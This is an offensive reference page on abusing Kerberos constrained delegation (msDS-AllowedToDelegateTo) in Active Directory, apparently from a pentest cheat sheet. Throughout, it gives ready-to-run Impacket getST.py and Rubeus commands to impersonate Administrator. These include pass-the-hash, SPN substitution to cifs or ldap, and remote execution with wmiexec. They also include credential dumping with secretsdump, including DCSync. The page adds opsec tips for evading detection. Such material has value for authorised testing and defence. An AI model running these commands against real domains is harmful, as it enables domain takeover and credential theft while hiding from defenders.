AllowedToDelegate
Source principal has constrained delegation configured (msDS-AllowedToDelegateTo), allowing it to request service tickets on behalf of any user to specific SPNs β and via sname substitution, to any service on those hosts.
Applies to: User/Computer β Computer
Key: the sname field in the resulting S4U2proxy ticket is NOT Kerberos-protected, so you can substitute any service (e.g.,
cifs,host,ldap) regardless of what's in the AllowedToDelegateTo list.
Linux Abuse
With Protocol Transition (TrustedToAuthForDelegation flag set)
# Impersonate any user to the configured SPN
getST.py -spn '<spn>' -impersonate Administrator \
-dc-ip <dc-ip> '<domain>/<username>:<password>'
# Pass-the-Hash
getST.py -spn '<spn>' -impersonate Administrator \
-dc-ip <dc-ip> -hashes ':<ntlm-hash>' '<domain>/<username>'
# Pass-the-Ticket (AES key for better opsec)
getST.py -spn '<spn>' -impersonate Administrator \
-dc-ip <dc-ip> -aesKey '<aes-key>' '<domain>/<username>'
# Use the ticket
export KRB5CCNAME=Administrator@<spn>@<domain>.ccache
wmiexec.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
secretsdump.py -k -no-pass '<domain>/Administrator@<target-computer>.<domain>'
SPN substitution β pivot to alternate service on same host
# Configured SPN: HTTP/<target-computer> β substitute cifs for admin access
getST.py -spn 'cifs/<target-computer>.<domain>' -impersonate Administrator \
-dc-ip <dc-ip> '<domain>/<username>:<password>'
# Or request ldap for dcsync if target is DC
getST.py -spn 'ldap/<dc-hostname>.<domain>' -impersonate Administrator \
-dc-ip <dc-ip> '<domain>/<username>:<password>'
export KRB5CCNAME=Administrator@ldap_<dc-hostname>.<domain>@<domain>.ccache
secretsdump.py -k -no-pass '<domain>/Administrator@<dc-hostname>.<domain>'
Without Protocol Transition (no TrustedToAuthForDelegation)
# Step 1: Obtain forwardable TGS for serviceA to serviceB (need a ticket for serviceB first)
getST.py -spn 'cifs/<intermediate-host>' -impersonate administrator '<domain>/<serviceB-user>:<password>'
# Step 2: Use forwardable ticket as additional-ticket for S4U2proxy to target
getST.py -spn 'cifs/<target-computer>.<domain>' -impersonate administrator \
-additional-ticket 'administrator@cifs_<intermediate-host>@<domain>.ccache' \
'<domain>/<username>:<password>'
Windows Abuse
Rubeus β with protocol transition (TrustedToAuthForDelegation)
# RC4 hash
Rubeus.exe s4u /user:<username> /rc4:<ntlm-hash> /impersonateuser:Administrator \
/msdsspn:<spn> /ptt
# AES256 key (better opsec)
Rubeus.exe s4u /user:<username> /aes256:<aes-key> /impersonateuser:Administrator \
/msdsspn:<spn> /ptt
# SPN substitution (altservice)
Rubeus.exe s4u /user:<username> /rc4:<ntlm-hash> /impersonateuser:Administrator \
/msdsspn:'HTTP/<target-computer>.<domain>' /altservice:cifs /ptt
Rubeus β without protocol transition (need a ticket first)
# Get TGT for delegating account
Rubeus.exe asktgt /user:<username> /rc4:<ntlm-hash> /outfile:tgt.kirbi
# S4U2self to get user ticket (non-forwardable without TrustedToAuthForDelegation)
# Then S4U2proxy using a forwardable ticket from another account in the chain
Rubeus.exe s4u /ticket:tgt.kirbi /impersonateuser:Administrator \
/msdsspn:<spn> /ptt
After ptt β access target
ls \\<target-computer>.<domain>\c$
Enter-PSSession -ComputerName <target-computer>.<domain>
Enumerate delegation configuration
Get-DomainComputer -TrustedToAuth | Select-Object -Property samaccountname,msds-allowedtodelegateto
Get-DomainUser -TrustedToAuth | Select-Object -Property samaccountname,msds-allowedtodelegateto
Opsec
- S4U2self + S4U2proxy chain generates Event ID 4769 (Kerberos service ticket request) on DC
- SPN substitution (altservice) is the key bypass β the substituted sname is not in the ticket's protected portion
- AES256 keys reduce detection vs RC4 (RC4 triggers Event ID 4769 with 0x17 encryption type)
- Target user must not be in Protected Users group or have "Account is sensitive and cannot be delegated" set
- Kerberos traffic must flow between attacker system and DC β requires domain network access